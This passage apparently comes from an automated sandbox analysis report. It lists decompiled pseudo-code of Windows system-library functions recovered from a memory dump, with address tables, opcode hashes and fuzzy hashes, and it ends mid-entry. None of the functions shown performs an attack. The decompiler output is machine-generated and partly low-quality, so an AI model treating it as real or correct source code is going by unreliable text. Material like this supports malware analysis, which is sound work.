                                      • Instruction Fuzzy Hash: AC0128726087419BC710EB39C844B9BBBE5BB84314F04D52AFD8683790DE30D541CB96
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05418ED6, Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 54%
                                      			E05418ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x543d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E05367D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0538B640(E05389AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                      0x05418ed6
                                      0x05418ee5
                                      0x05418eed
                                      0x05418ef0
                                      0x05418efa
                                      0x05418f03
                                      0x05418f0c
                                      0x05418f15
                                      0x05418f24
                                      0x05418f27
                                      0x05418f31
                                      0x05418f43
                                      0x05418f33
                                      0x05418f3c
                                      0x05418f3c
                                      0x05418f4e
                                      0x05418f4f
                                      0x05418f51
                                      0x05418f56
                                      0x05418f69

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 73f747146c428bcada0a4fd9308689a2062664c98c8f3023e649b6dde4164c78
                                      • Instruction ID: 77b6bae5be489fe58e9e35f01f2ae321582b6327843226f97cdb7af6e28e0d8e
                                      • Opcode Fuzzy Hash: 73f747146c428bcada0a4fd9308689a2062664c98c8f3023e649b6dde4164c78
                                      • Instruction Fuzzy Hash: 7D112170E042099FDB04DFA8D445BAEFBF4FF08300F0442AAE919EB382E6349940CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05418A62, Relevance: .0, Instructions: 44COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 54%
                                      			E05418A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x543d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E05367D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0538B640(E05389AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                      0x05418a62
                                      0x05418a71
                                      0x05418a79
                                      0x05418a82
                                      0x05418a85
                                      0x05418a89
                                      0x05418a8c
                                      0x05418a8f
                                      0x05418a92
                                      0x05418a95
                                      0x05418a9f
                                      0x05418ab1
                                      0x05418aa1
                                      0x05418aaa
                                      0x05418aaa
                                      0x05418abc
                                      0x05418abd
                                      0x05418abf
                                      0x05418ac4
                                      0x05418ada

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6cc9665593bb6382e5f0b6b82fe66d76dfa98f56db63869fd942680abff7c18f
                                      • Instruction ID: bb19b2190a63b223719abaa2df1d8746ae91192906420ddb627534522d8b8d2a
                                      • Opcode Fuzzy Hash: 6cc9665593bb6382e5f0b6b82fe66d76dfa98f56db63869fd942680abff7c18f
                                      • Instruction Fuzzy Hash: 54012171A0021D9FDB04DFA9D9459EEB7B8FF48350F10405AF905E7351D634A901CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0534DB60, Relevance: .0, Instructions: 43COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0534DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0534DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0534E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0534E8B0(__ecx, _t14, 0xfff);
							L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                      0x0534db64
                                      0x0534db66
                                      0x0534db6b
                                      0x0534dbaa
                                      0x0534db71
                                      0x0534db76
                                      0x0534db7a
                                      0x0534dba3
                                      0x0534db7c
                                      0x0534db87
                                      0x0534db8b
                                      0x053a4fa1
                                      0x053a4fb3
                                      0x053a4fb8
                                      0x0534db91
                                      0x0534db96
                                      0x0534db98
                                      0x0534db98
                                      0x0534db8b
                                      0x0534db7a
                                      0x0534db9d
                                      0x0534dba2

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                      • Instruction ID: 190bd18af40df7e821e2e5b910948ab939bff6fca6dca6a117b96e37d43d748f
                                      • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                      • Instruction Fuzzy Hash: 05F09C333456229FD732AA554884F67BADADFC1A60F150875F1069B744C9B4AC029EE1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0534B1E1, Relevance: .0, Instructions: 42COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0534B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E05367D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E05367D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E053C7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                      0x0534b1e8
                                      0x0534b1ea
                                      0x0534b1f3
                                      0x053a4a17
                                      0x0534b1f9
                                      0x0534b1f9
                                      0x0534b1f9
                                      0x0534b201
                                      0x053a4a21
                                      0x053a4a2e
                                      0x00000000
                                      0x00000000
                                      0x053a4a3b
                                      0x053a4a4d
                                      0x053a4a3d
                                      0x053a4a46
                                      0x053a4a46
                                      0x053a4a55
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0534b20a
                                      0x0534b20a
                                      0x0534b20a
                                      0x0534b20a

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                      • Instruction ID: 313292c7488b3f8f4a7a61d5a3eea85c9f94062ad6a48aaf3ec38df1d9ab7243
                                      • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                      • Instruction Fuzzy Hash: 9601F4333046809BDB22975DC808F69BBDAFF81794F0844A5FA158B6B5D6B9D800C715
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 053DFE87, Relevance: .0, Instructions: 38COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 46%
                                      			E053DFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x543d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E05367D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0538B640(E05389AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                      0x053dfe96
                                      0x053dfe9e
                                      0x053dfea1
                                      0x053dfead
                                      0x053dfeb3
                                      0x053dfeb9
                                      0x053dfec3
                                      0x053dfed5
                                      0x053dfec5
                                      0x053dfece
                                      0x053dfece
                                      0x053dfee0
                                      0x053dfee1
                                      0x053dfee3
                                      0x053dfee8
                                      0x053dfefb

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 411326579e336facf26e127e5a7cde5493140135b5c65347a0d16a6a04129578
                                      • Instruction ID: 1bb7827192b651586d9cc0950814a3fdf7032bf01fc073b3006dcaeaeb24149a
                                      • Opcode Fuzzy Hash: 411326579e336facf26e127e5a7cde5493140135b5c65347a0d16a6a04129578
                                      • Instruction Fuzzy Hash: F9016271A04208AFCB14DFA8D986A6EB7F4FF04304F104199B505DB392DA35DA01CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05418F6A, Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 48%
                                      			E05418F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x543d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E05367D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0538B640(E05389AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                      0x05418f6a
                                      0x05418f79
                                      0x05418f81
                                      0x05418f84
                                      0x05418f8b
                                      0x05418f91
                                      0x05418f94
                                      0x05418f9e
                                      0x05418fb0
                                      0x05418fa0
                                      0x05418fa9
                                      0x05418fa9
                                      0x05418fbb
                                      0x05418fbc
                                      0x05418fbe
                                      0x05418fc3
                                      0x05418fd6

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c8cdb35ede72d1ca69ed0c853975b6dbcd6c2aa08866f84f6901ff902d0e5c98
                                      • Instruction ID: f650be2e64cdff0f3fd74a8b36d044ed3767c1bb7cdd8e9976deb019214cfee6
                                      • Opcode Fuzzy Hash: c8cdb35ede72d1ca69ed0c853975b6dbcd6c2aa08866f84f6901ff902d0e5c98
                                      • Instruction Fuzzy Hash: 0C014474E0420CAFDB04EFA8D545AAEB7F4FF48300F50445AB905EB391DA34DA00CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0540131B, Relevance: .0, Instructions: 36COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 48%
                                      			E0540131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x543d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E05367D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0538B640(E05389AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                      0x0540131b
                                      0x0540132a
                                      0x05401330
                                      0x05401336
                                      0x0540133e
                                      0x05401341
                                      0x05401344
                                      0x0540134f
                                      0x05401361
                                      0x05401351
                                      0x0540135a
                                      0x0540135a
                                      0x0540136c
                                      0x0540136d
                                      0x0540136f
                                      0x05401374
                                      0x05401387

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 49e01b0cb067a5eeb3cc0764f2a0993b86406635790fac473cbf9106b0916d12
                                      • Instruction ID: 1eeb79dfe339ada283fa238a5480dd90b80935d78d31b43a8b421e2f41480228
                                      • Opcode Fuzzy Hash: 49e01b0cb067a5eeb3cc0764f2a0993b86406635790fac473cbf9106b0916d12
                                      • Instruction Fuzzy Hash: 35013171E05208AFDB04EFA9D945AAEB7F4FF08740F50806AB845EB391E6349A00CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05401608, Relevance: .0, Instructions: 34COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 46%
                                      			E05401608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x543d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E05367D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0538B640(E05389AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                      0x05401608
                                      0x05401617
                                      0x0540161d
                                      0x05401625
                                      0x05401628
                                      0x0540162b
                                      0x05401636
                                      0x05401648
                                      0x05401638
                                      0x05401641
                                      0x05401641
                                      0x05401653
                                      0x05401654
                                      0x05401656
                                      0x0540165b
                                      0x0540166e

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 244080e291c14304ece1b2a26a6ecda65ffdeee86045c01648dd97bb913ed7c7
                                      • Instruction ID: a5234de06b717b22e9312ca00debd4d9cc490884baa02579a557437c2c0c56aa
                                      • Opcode Fuzzy Hash: 244080e291c14304ece1b2a26a6ecda65ffdeee86045c01648dd97bb913ed7c7
                                      • Instruction Fuzzy Hash: D5F06271E14248EFDB04EFA8D845AAEB7F4EF04300F4444A9B905EB391EA34D900CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0536C577, Relevance: .0, Instructions: 33COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0536C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0536C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x53211cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E054188F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                      0x0536c577
                                      0x0536c57d
                                      0x0536c581
                                      0x0536c5b5
                                      0x0536c5b9
                                      0x0536c5ce
                                      0x0536c5ce
                                      0x0536c5ca
                                      0x00000000
                                      0x0536c5ca
                                      0x0536c5c4
                                      0x0536c5c8
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x0536c5ad
                                      0x00000000
                                      0x0536c5af

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 99b5109f4f9c46562ccbbbf08bfd97160f8080c76a20fab94935d9f0ebc1a9c8
                                      • Instruction ID: b2c1181870451aaa13941d53f0720919fd373507c22d387888675250f11fcec2
                                      • Opcode Fuzzy Hash: 99b5109f4f9c46562ccbbbf08bfd97160f8080c76a20fab94935d9f0ebc1a9c8
                                      • Instruction Fuzzy Hash: 19F024B291569C8FD731C316C81CF217BF9AB05230F44E46FD68683509C6E0DC80C250
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05418D34, Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 43%
                                      			E05418D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x543d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E05367D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0538B640(E05389AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                      0x05418d34
                                      0x05418d43
                                      0x05418d4b
                                      0x05418d4e
                                      0x05418d52
                                      0x05418d5c
                                      0x05418d6e
                                      0x05418d5e
                                      0x05418d67
                                      0x05418d67
                                      0x05418d79
                                      0x05418d7a
                                      0x05418d7c
                                      0x05418d81
                                      0x05418d94

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 52b4b0f9ed4420613fa4c95927920daee5dde4c6a6ca6e54616882c8a3fd1c3d
                                      • Instruction ID: 9ddb8abb8cea409efaa882495536b6fb46209ba6f7e36593fbecbf31da9d8945
                                      • Opcode Fuzzy Hash: 52b4b0f9ed4420613fa4c95927920daee5dde4c6a6ca6e54616882c8a3fd1c3d
                                      • Instruction Fuzzy Hash: D2F03070E147089FDB18EBA8D546BAEB7B4EB14644F508499E906AB291DA34D9008754
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 05402073, Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 94%
                                      			E05402073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E053FFD22(__ecx);
				_t19 =  *0x543849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x5438748; // 0x0
					if(__eflags <= 0) {
						E05401C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x5438724 & 0x00000004;
							if(( *0x5438724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x5438724; // 0x0
					return E053F8DF1(__ebx, 0xc0000374, 0x5435890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                      0x05402076
                                      0x05402078
                                      0x0540207d
                                      0x05402083
                                      0x054020a4
                                      0x054020aa
                                      0x054020ac
                                      0x054020b7
                                      0x054020ba
                                      0x054020bc
                                      0x054020c9
                                      0x054020c9
                                      0x054020d0
                                      0x054020d2
                                      0x00000000
                                      0x054020d2
                                      0x054020be
                                      0x054020c3
                                      0x054020c5
                                      0x054020c7
                                      0x00000000
                                      0x00000000
                                      0x054020c7
                                      0x054020bc
                                      0x054020d4
                                      0x05402085
                                      0x05402085
                                      0x054020a3
                                      0x054020a3

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bae1433293c80ae39778a9a0e1e276f751650fea7361ad0e7a557e3df99a1df
                                      • Instruction ID: 1700e73f10539331b933b85c314b68ec33476fa542fa97664156f667c41dfdab
                                      • Opcode Fuzzy Hash: 4bae1433293c80ae39778a9a0e1e276f751650fea7361ad0e7a557e3df99a1df
                                      • Instruction Fuzzy Hash: C2F0273E52E2844ACF3A5B24A40A6E3BF92E745110B2920D7F651273C0CAB48983CB11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0538927A, Relevance: .0, Instructions: 32COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 54%
                                      			E0538927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L05364620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0538FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E053892C6(_t11, _t14);
				}
				return _t11;
			}





                                      0x05389295
                                      0x05389299
                                      0x0538929f
                                      0x053892aa
                                      0x053892ad
                                      0x053892ae
                                      0x053892af
                                      0x053892b0
                                      0x053892b4
                                      0x053892bb
                                      0x053892bb
                                      0x053892c5

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                      • Instruction ID: d68dc621255c2f3bc582496bf445656397f3f329637bd3c821f44bbce300fc0b
                                      • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                      • Instruction Fuzzy Hash: 78E09B323406406BD715AF55DCC4F67775DEF82735F04407DB5055E242C6EADD0987A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0536746D, Relevance: .0, Instructions: 31COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 88%
                                      			E0536746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E0535EB70(__ecx, 0x54379a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E053895D0();
							L053677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                      0x0536746d
                                      0x0536746d
                                      0x0536746d
                                      0x05367471
                                      0x05367488
                                      0x053af92d
                                      0x0536748e
                                      0x05367491
                                      0x05367495
                                      0x053af937
                                      0x053af93a
                                      0x053af94e
                                      0x053af953
                                      0x053af956
                                      0x053af956
                                      0x05367495
                                      0x00000000
                                      0x05367488
                                      0x05367473
                                      0x05367478
                                      0x0536747d
                                      0x05367481
                                      0x00000000
                                      0x05367481
                                      0x0536747d
                                      0x0536747a
                                      0x00000000

                                      Memory Dump Source
                                      • Source File: 0000000E.00000002.915229088.0000000005320000.00000040.00000001.sdmp, Offset: 05320000, based on PE: true
                                      • Associated: 0000000E.00000002.915484895.000000000543B000.00000040.00000001.sdmp Download File
                                      • Associated: 0000000E.00000002.915505198.000000000543F000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4c03ca885a5bc6b33d08edc23d7bfe7a06cf55a6bffff0adf3287c31070a8f8
                                      • Instruction ID: a84e239cd17fc680c5a7e338e1dc94801af9f7c8bd83bfd45f39a820dc606632
